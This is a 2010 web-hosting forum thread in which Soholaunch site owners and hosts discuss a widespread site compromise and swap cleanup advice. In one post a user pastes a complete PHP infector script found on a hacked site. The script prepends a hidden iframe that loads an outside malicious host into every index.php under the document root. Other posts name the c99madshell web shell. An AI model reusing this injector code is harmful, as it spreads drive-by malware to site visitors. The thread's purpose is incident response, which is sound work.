Jump to content


Photo
- - - - -

"Trojan Horse"


  • Please log in to reply
34 replies to this topic

#21 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 22 June 2010 - 08:39 AM

Yep - mine is the only IP address logged... It's a mystery :hmm:
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#22 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 22 June 2010 - 03:47 PM

The only thing I could think of is maybe cron a search for the string so you get a timetable of when it changes, and then log-dive to see what's accessing anything during that time. That would at least narrow down the "when" of it happening so that you don't have to eyeball thousands of lines.

(If you have access to the server, ConfigServer Firewall has Directory and file watching capability with reports if a watched directory or a file changes.)

DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.


#23 kyle04

kyle04

    Senior Member

  • Moderators
  • 411 posts

Posted 22 June 2010 - 10:41 PM

Your ftp client (I use Filezilla) should list the date/time last modified for every file....

#24 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 23 June 2010 - 08:59 AM

Thanks Jen; unfortunately I don't have access to this server. They used to be a hosting client of mine until I gave it all up.... However, I do know the chap who hosts them now pretty well and he's a bit of a Unix guru so maybe I can prevail upon his good nature.. :geek:

Changing the perms on the file doesn't seem to have compromised the site's functionality at all, so maybe I'll ask my man to let me have some of his logs!!

Don't ask, don't get ;)
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#25 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 07 July 2010 - 10:28 AM

I don't understand your post: the URL goes to a 404 error and looking at the code, it seems your site is unaffected anyway :confused:
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#26 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 16 July 2010 - 09:48 PM

Had another run-in with this little bugger on another site of ours. The site hadn't been updated in a while. This one was putting an iframe up on all the pages and also had a photo.php file in the media folder. Only difference was that this time the php file was not encoded. Below is the php.

<?$sInjectPHP = "<iframe src=\"http://karatepacan.co.cc/up/go.php?sid=2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"?><?
$iMaxDepth = 4;
$iCurrDepth = 0;

$sDir = $_SERVER['DOCUMENT_ROOT'].'/';
Infect($sDir);

function Infect($sDir)
{
global $iCurrDepth;
global $iMaxDepth;
global $sInjectPHP;
global $sInjectHTML;
global $sLog;

if(file_exists($sDir) and $hDir = @opendir($sDir))
{
while(($sFileName = readdir($hDir)))
{
if(is_file($sDir.$sFileName))
{
$sExtension = substr($sFileName, strrpos($sFileName, '.')+1);
switch($sExtension)
{
case 'php':
if($sFileName == 'index.php')
{
$sFile = file_get_contents($sDir.$sFileName);
$sFile = '<body>'.$sInjectPHP.'</body>'.$sFile;
file_put_contents($sDir.$sFileName, $sFile);
}
break;

/*case 'htm':
case 'html':
chmod($sDir.$sFileName, 666);
$sFile = file_get_contents($sDir.$sFileName);
$iPos = stripos($sFile, '</body>');
if($iPos) $sFile = substr($sFile, 0, $iPos).$sInjectHTML.substr($sFile, $iPos);
else $sFile .= $sInjectHTML;
file_put_contents($sDir.$sFileName, $sFile);
break;*/
}
}
/*else if (is_dir($sDir.$sFileName) && $sFileName != '.' &&
$sFileName != '..' && $iCurrDepth <= $iMaxDepth)
{
$iCurrDepth++;
Infect($sDir.$sFileName.'/');
$iCurrDepth--;
}*/
}
closedir($hDir);
}
}
?>


#27 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 16 July 2010 - 09:51 PM

We had half of the sites on our servers exploited with this (half of the Soholaunch sites). The update from Monday patches the hole, but if you don't have root and your clients don't update, they're likely going to get hit with it. It was pretty widespread.

If you do have a server, contact soho, they have a patch script you can run to mass patch all without upgrading.

DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.


#28 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 18 July 2010 - 08:57 PM

Nice, thanks! Yeah, we have soho on close to 40 accounts on our server

#29 DLecaval

DLecaval

    Newbie

  • Members
  • Pip
  • 2 posts

Posted 20 July 2010 - 12:34 AM

Hi, I had the same problem but after deleting photo.php, photo galery won't display photo anymore.
should there be a photo.php in media folder or elsewhere? If so where can I find a clean one?

Tks.

Daniel

#30 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 21 July 2010 - 01:57 PM

Just had another site that was infected. This time I was able to pull one of the files that was in base 64 and run it on my mac. I've run into this before, it's called c99madshell madnet edition, which you can google and check out for yourself. Basically, it allows whoever is running the php file to browse through your directories and view file contents and run linux commands. I can't stress enough how important it is to look everything over after you run the soho update and make sure you change all your passwords.

#31 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 21 July 2010 - 06:36 PM

Just want to add an update - I'm starting to get a flood of notices from Google about Soho sites being pegged as Malware sites that have been infected - I've gotten four one after another in the last hour that have been yanked from the search engine.

I would suggest, if folks have not, that they:

Get an Account with Google Webmaster tools: Google Webmaster Central now
Verify their site
Make sure it has not been picked up yet as malware infected.
Check with your host regarding their malware infection policies - some hosts get Google notices and you are suspended or terminated, so find out before you get caught what your host's policy is.

We'll have a blog post up regarding this issue to our specific customers within an hour or two.

DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.


#32 gridstructure

gridstructure

    Newbie

  • Members
  • Pip
  • 3 posts

Posted 25 July 2010 - 09:31 PM

My site built with soho launch has also just been infected with malware from klezmoo.co.cc updates java script even if not requested when entering site. Google alert coming up but on link sent by host company it went straight in and started downloading. Any one got any idea how to fix it with out closing site?

#33 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 26 July 2010 - 09:37 AM

There's a number of suggestions in this thread.... Have you tried any of them yet?
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#34 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 26 July 2010 - 08:02 PM

My site built with soho launch has also just been infected with malware from klezmoo.co.cc updates java script even if not requested when entering site. Google alert coming up but on link sent by host company it went straight in and started downloading. Any one got any idea how to fix it with out closing site?


If your site is hacked now, and serving malicious software, you need to take that site offline *now* - not when you figure out how to clean it, not in a few days, now. You are potentially infecting your clients and visitors, if you take credit cards, potentially opening your site up to hefty PCI fines.

The easiest way to take a site offline for a user is to rename public_html, create a new public_html directory, and upload a page explaining that you are offline for maintenance. Then you can reinstall a current version of Soholaunch that doesn't have the hole in it, upload a backup (if you're sure it's clean), and be back and business with a minimum of fuss (making sure to change all the logins).

If you don't have a clean backup (or any backup at all), you have a pretty large problem and may have to rebuild.

DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.


#35 HongMei65

HongMei65

    Soho Novice

  • Members
  • Pip
  • 1 posts

Posted 19 November 2010 - 07:10 AM

This is a good post,i like it very much,i hope that you can creat more post like this.best wishes.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users